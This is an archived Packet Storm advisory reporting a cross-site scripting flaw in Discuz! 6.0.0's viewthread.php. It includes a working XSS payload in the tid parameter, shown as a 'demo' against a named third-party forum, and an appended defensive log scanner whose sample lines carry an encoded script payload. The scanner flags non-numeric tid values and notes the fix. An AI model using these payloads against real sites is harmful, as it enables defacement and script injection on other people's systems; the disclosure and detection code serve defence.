Discuz! 6.0.0 Cross Site Scripting

2010-01-27T00:00:00
ID PACKETSTORM:85656
Type packetstorm
Reporter s4r4d0
Modified 2010-01-27T00:00:00

Description

                                        
`# Discuz! 6.0.0  
# Download:  
http://www.comsenz.com/downloads/install/discuz  
# Vendor: www.comsenz.com  
# Author: s4r4d0  
# mail: s4r4d0@yahoo.com  
# Bug: Cross site scripting has been found on viewthread.php file.  
# Exploit: http://host/bbs/viewthread.php?tid=[Xss]  
# Demo: http://www.socvista.com/bbs/viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal  
Error</h1></marquee>  
# Made in Brazil  
# Team: Fatal Error  
`
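
For defenders triaging this report, the following added example (not part of the original advisory and not Discuz! code) scans web server access logs for requests to `viewthread.php` whose `tid` parameter is not a plain number. It assumes combined log format and that legitimate thread IDs are decimal integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample entries in combined log format (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jan/2010:10:00:00 +0000] "GET /bbs/viewthread.php?tid=4521&page=2 HTTP/1.1" 200 18234',
    '192.0.2.77 - - [27/Jan/2010:10:00:05 +0000] "GET /bbs/viewthread.php?tid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 17990',
    '192.0.2.11 - - [27/Jan/2010:10:00:09 +0000] "GET /bbs/forumdisplay.php?fid=3 HTTP/1.1" 200 9000',
    '192.0.2.12 - - [27/Jan/2010:10:00:12 +0000] "GET /bbs/viewthread.php?tid=12abc HTTP/1.1" 200 17001',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
NUMERIC_RE = re.compile(r"[0-9]+")   # assumption: a legitimate tid is a plain decimal ID
MARKUP_RE = re.compile(r"[<>\"']")   # characters that can break out of an HTML attribute or tag


def check_line(line):
    """Return a finding dict if the line requests viewthread.php with a non-numeric tid."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group("target"))
    if not url.path.lower().endswith("/viewthread.php"):
        return None
    # parse_qs percent-decodes values; keep_blank_values so an empty "tid=" is still checked.
    for tid in parse_qs(url.query, keep_blank_values=True).get("tid", []):
        if not NUMERIC_RE.fullmatch(tid):
            return {
                "client": line.split()[0],
                "tid": tid,
                "markup": bool(MARKUP_RE.search(tid)),
            }
    return None


def scan(lines):
    """Check every log line and return the findings in order."""
    return [f for f in map(check_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same numeric-only rule is the natural server-side fix: reject or integer-cast `tid` before it is used, and HTML-encode it wherever it is echoed into the page.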